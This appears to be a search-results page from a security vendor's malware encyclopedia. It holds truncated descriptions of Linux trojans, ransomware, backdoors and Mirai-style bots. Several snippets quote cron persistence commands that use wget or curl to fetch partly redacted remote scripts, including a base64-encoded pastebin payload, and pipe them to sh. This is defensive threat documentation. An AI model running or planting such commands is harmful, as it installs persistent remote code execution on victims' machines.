Search
Keyword: usojan.sh.mirai.boi
This malware checks if the main executable is executed by root and the file name is "boomsh". If so, it then takes ownership and sets the permission (Read only, Execute Only, Full) to
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
'/var/spool/cron/crontabs/'"$USER" Schedule: Every 15 minutes Command: "*/15 * * * * ((wget -q -O- https://pastebin.com/raw/{BLOCKED}tb || curl -fsSL https://pastebin.com/raw/{BLOCKED}tb) | base64 -d) | sh" > cron.d 2>&1
This Hacking Tool arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It does not have any propagation routine. It does
-fsSL http://lsd.{BLOCKED}ten.org||wget -q -O- http://lsd.{BLOCKED}ten.org)|sh Path: /var/spool/cron/root Schedule: Every 15 minutes Command: */15 * * * * (curl -fsSL http://lsd.{BLOCKED}ten.org||wget -q
following cron jobs for persistence: Path: /var/spool/con/crontabs/root Schedule: Every minute Command: wget -q -O - http://{BLOCKED}.{BLOCKED}.169.247/cr2.sh | sh > /dev/null 2>&1
Arrival Details This malware arrives via the following means: Downloaded by Trojan.SH.BROOTKIT.A Other Details This Rootkit does the following: It is used by Trojan.SH.BROOTKIT.B for its rootkit
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It encrypts files with specific file extensions. It
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. It encrypts files
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It encrypts files with specific file extensions.
GETPUBLICIP VERSION RANGE SPOOFABLE HTTP UDP TCP CNC STD KILLATTK LOLNOGTFO BUILD PONG DUP SH It connects to the following URL(s) to send and receive commands from a remote malicious user: {BLOCKED}.{BLOCKED
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan may be downloaded by other malware/grayware from remote sites. It requires its main component to successfully perform its intended routine. It deletes itself after execution. Arrival
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This backdoor may be dropped by other malware. It executes commands from a remote malicious user, effectively compromising the affected system. Arrival Details This backdoor may be dropped by other
This Backdoor executes commands from a remote malicious user, effectively compromising the affected system. It connects to a website to send and receive information. It receives commands from a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a